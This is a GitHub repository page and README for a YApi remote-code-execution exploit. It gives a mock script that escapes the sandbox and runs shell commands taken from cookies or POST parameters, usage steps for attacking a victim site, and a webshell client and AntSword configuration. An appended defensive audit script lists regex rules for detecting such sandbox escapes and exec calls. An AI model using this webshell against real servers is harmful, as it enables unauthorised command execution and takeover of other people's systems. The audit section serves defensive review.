https://github.com/esonhugh/yapi-rce-webshell
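Yapi mock script RCE another version. Webshell way. Another way to get command execution in Yapi, using a webshell approach; compared with other exploitation methods it is more fine-grained and controllable, with less impact.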
Last synced: 27 days ago
- Host: GitHub
- URL: https://github.com/esonhugh/yapi-rce-webshell
- Owner: Esonhugh
- Created: 2022-05-13T18:17:33.000Z (over 2 years ago)
- Default Branch: Skyworship
- Last Pushed: 2024-07-04T05:28:58.000Z (7 months ago)
- Last Synced: 2024-12-26T15:09:21.872Z (about 1 month ago)
- Topics: exp, exploit, mock, mockjs, rce, webshell, yapi
- Language: Python
- Homepage:
- Size: 8.79 KB
- Stars: 65
- Watchers: 2
- Forks: 4
- Open Issues: 1
Metadata Files:
- Readme: README.md
README
# yapi-rce-webshell
Yapi mock script RCE another version. Webshell way. https://github.com/YMFE/yapi/issues/2099
# funny things
usage:
1. victim yapi website
2. register account
3. create project and create api in it
4. create mock script like
```js
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()
// you can also add exec function to do some async jobs like running enum scripts
```
5. use the python script to connect to the webshell and interact
```bash
python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test } -i # interactive mode
# or
python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test} {cmd dir,you can use "."} {command location}
```
# AntSword-like Alternative
1. Same as usage
2. But Create an API With Advanced Mock POST Method.
```js
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync(params.data).toString()
// you can also add exec function to do some async jobs like running enum scripts
```
3. Open AntSword
4. Create with Config like
- Type: CMDLINUX
- Pass: data
- URL: mock url in Yapi config
- encoder: default
- decoder: base64
5. enjoy your webshell
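
On the defender's side of both procedures above (the cookie-driven script and the `params.data` variant), a static check over stored mock scripts can flag the constructor-chain sandbox escape and command execution during an audit or before a script is saved. This is an added example, not code from the repository; `auditMockScript`, the rule ids and samples 2 and 3 are constructed for illustration, and the regex rules are a triage aid, not a replacement for a real sandbox.

```javascript
// Added example (not from the yapi-rce-webshell repo): static audit of Yapi
// mock scripts. Rule ids, auditMockScript() and the samples are constructed.
const RULES = [
  // Two or more ".constructor" hops reach the host Function constructor, even via aliases.
  { id: "constructor-chain", min: 2, re: /\.constructor\b/g },
  // Any reference to the Node.js process object from inside a mock script.
  { id: "process-handle", min: 1, re: /\bprocess\b/g },
  // Module loading from inside the sandbox.
  { id: "module-loader", min: 1, re: /\bmainModule\b|\brequire\s*\(/g },
  // Command execution primitives.
  { id: "child-process", min: 1, re: /child_process|\b(?:exec|execSync|spawn|spawnSync)\s*\(/g },
  // Request-controlled values (cookie.*, params.*) passed into an exec call.
  { id: "request-to-exec", min: 1, re: /\bexec\w*\s*\([^)]*\b(?:cookie|params)\./g },
];

function auditMockScript(source) {
  const hits = RULES
    .filter((r) => (source.match(r.re) || []).length >= r.min)
    .map((r) => r.id);
  const escape = hits.includes("constructor-chain") && hits.includes("process-handle");
  const exec = hits.includes("child-process");
  const verdict = escape || exec ? "block" : hits.length ? "review" : "ok";
  return { verdict, hits };
}

// Sample 1: the mock script shape from step 4 of the README (cookie-driven).
const COOKIE_SCRIPT = `
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()
`;
// Sample 2 (constructed): an ordinary mock script that only shapes a response.
const BENIGN_SCRIPT = `
mockJson = { code: 0, data: { id: params.id, name: "demo" } }
`;
// Sample 3 (constructed): touches process without the chain; needs a human look.
const ODD_SCRIPT = `
mockJson = { pid: process.pid }
`;

function auditAll(scripts) {
  return Object.fromEntries(
    Object.entries(scripts).map(([name, src]) => [name, auditMockScript(src).verdict])
  );
}
console.log(auditAll({ COOKIE_SCRIPT, BENIGN_SCRIPT, ODD_SCRIPT }));
```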